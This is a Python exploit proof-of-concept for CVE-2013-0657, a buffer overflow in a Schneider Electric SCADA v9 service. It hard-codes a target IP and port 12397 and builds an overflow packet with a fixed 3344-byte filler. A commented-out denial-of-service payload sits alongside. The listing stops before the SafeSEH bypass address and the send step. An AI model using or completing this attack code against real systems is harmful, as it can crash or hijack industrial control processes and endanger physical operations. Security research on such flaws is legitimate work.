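# Title: SEIG SCADA SYSTEM 9 - Remote Code Execution
# Author: Alejandro Parodi
# Date: 2018-08-17
# Vendor Homepage: https://www.schneider-electric.com
# Software Link: https://www.schneider-electric.ie/en/download/document/V9_Full_installation_package_register_and_receive_file/
# Version: v9
# Tested on: Windows7 x86
# CVE: CVE-2013-0657
# References:
# https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0657
"""Proof-of-concept packet builder for CVE-2013-0657 (SCADA v9, TCP 12397).

The script assembles a crafted message: a 2-byte header, a fixed-size
filler that overruns the target buffer, and (in the truncated tail of this
listing) a SafeSEH-bypass address. The filler length and the bypass address
are tied to the tested build (v9 on Windows 7 x86); they will not transfer to
other builds or platforms without being recomputed.

Run only against systems you are explicitly authorised to test: the payload
is designed to crash or hijack an industrial control process.
"""

import socket
import struct

# Target. Hard-coded on purpose for the PoC -- edit before running.
ip = "192.168.0.23"
port = 12397  # service listener this PoC targets
con = (ip, port)

# DoS Payload found in the research (CRUNCHBASE UNEXPECTED PARAMETER)
# length = "\x00\x70\x00\x00\x00\x00\x00\x00"
# message = "\x00\x70AA\x65\x00\x00\x00AAAAAAAAAAAAAAAA\x00\x00\x00\x00"+"B"*28644
# payload = length+message

# Exploit Magic
# Presumably little-endian on the wire (the captured DoS payload above starts
# \x00\x70, and this packs 0x6000 the same way). "<H" pins that byte order
# explicitly; the original bare "H" used the attacking host's native order and
# would produce \x60\x00 on a big-endian machine.
message_header = struct.pack("<H", 0x6000)

# Filler that overruns the vulnerable buffer; 3344 is the offset found for the
# tested build. Use a bytes literal: struct.pack returns bytes, so the
# concatenation with the header only works on Python 3 if the filler is bytes
# too (identical result on Python 2, where b"" is a plain str).
padding = b"B" * 3344

# The listing is truncated at this point. It continued with
#   eip_safeseh_bypass_address = struct.pack("
# i.e. the address written over the SEH record to bypass SafeSEH, followed by
# the socket send over `con`. The address is not recoverable from this page,
# and in any case must be found for the exact target binary rather than copied.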